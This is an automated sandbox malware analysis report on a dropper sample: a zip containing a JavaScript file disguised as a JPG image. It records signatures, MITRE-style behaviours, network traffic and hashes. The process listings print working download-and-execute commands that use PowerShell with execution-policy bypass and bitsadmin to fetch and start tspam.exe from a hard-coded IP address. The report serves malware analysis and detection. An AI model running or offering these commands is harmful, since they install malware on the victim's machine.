Malware Analysis Report

2024-10-24 20:51

Sample ID 240825-t6lsqsvhrk
Target c126d9b909d774a177d560de530aea04_JaffaCakes118
SHA256 e75526203c179e1a888238ecc91b03131494a4b017cd0207a38d422c3a0e49a0
Tags
dropper execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e75526203c179e1a888238ecc91b03131494a4b017cd0207a38d422c3a0e49a0

Threat Level: Known bad

The file c126d9b909d774a177d560de530aea04_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

dropper execution

Blocklisted process makes network request

Download via BitsAdmin

Checks computer location settings

Command and Scripting Interpreter: PowerShell

Enumerates physical storage devices

Command and Scripting Interpreter: JavaScript

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-25 16:40

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-25 16:40

Reported

2024-08-25 16:42

Platform

win10v2004-20240802-en

Max time kernel

121s

Max time network

147s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\c126d9b909d774a177d560de530aea04_JaffaCakes118.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\c126d9b909d774a177d560de530aea04_JaffaCakes118.zip

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-25 16:40

Reported

2024-08-25 16:42

Platform

win7-20240705-en

Max time kernel

122s

Max time network

123s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\PIC176174.jpg.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\PIC176174.jpg.js

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspam.exe','C:\Users\Admin\AppData\Local\Temp\394955.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\394955.exe'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer twetaeihwuwe /download /priority high http://217.8.117.63/tspam.exe C:\Users\Admin\AppData\Local\Temp\558392.exe&start C:\Users\Admin\AppData\Local\Temp\558392.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspam.exe','C:\Users\Admin\AppData\Local\Temp\394955.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\394955.exe'

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer twetaeihwuwe /download /priority high http://217.8.117.63/tspam.exe C:\Users\Admin\AppData\Local\Temp\558392.exe

Network

Country Destination Domain Proto
RU 217.8.117.63:80 tcp
RU 217.8.117.63:80 tcp

Files

memory/2364-4-0x000000001B470000-0x000000001B752000-memory.dmp

memory/2364-5-0x0000000002A70000-0x0000000002A78000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-25 16:40

Reported

2024-08-25 16:42

Platform

win10v2004-20240802-en

Max time kernel

148s

Max time network

150s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\PIC176174.jpg.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\PIC176174.jpg.js

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspam.exe','C:\Users\Admin\AppData\Local\Temp\394955.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\394955.exe'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer twetaeihwuwe /download /priority high http://217.8.117.63/tspam.exe C:\Users\Admin\AppData\Local\Temp\558392.exe&start C:\Users\Admin\AppData\Local\Temp\558392.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspam.exe','C:\Users\Admin\AppData\Local\Temp\394955.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\394955.exe'

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer twetaeihwuwe /download /priority high http://217.8.117.63/tspam.exe C:\Users\Admin\AppData\Local\Temp\558392.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
RU 217.8.117.63:80 tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
RU 217.8.117.63:80 tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/4940-0-0x00007FF8A7753000-0x00007FF8A7755000-memory.dmp

memory/4940-1-0x00007FF8A7750000-0x00007FF8A8211000-memory.dmp

memory/4940-7-0x00000201E8760000-0x00000201E8782000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcahonyt.dty.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4940-12-0x00007FF8A7750000-0x00007FF8A8211000-memory.dmp

memory/4940-13-0x00007FF8A7750000-0x00007FF8A8211000-memory.dmp

memory/4940-16-0x00007FF8A7750000-0x00007FF8A8211000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-25 16:40

Reported

2024-08-25 16:42

Platform

win7-20240704-en

Max time kernel

120s

Max time network

122s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\c126d9b909d774a177d560de530aea04_JaffaCakes118.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\c126d9b909d774a177d560de530aea04_JaffaCakes118.zip

Network

N/A

Files

N/A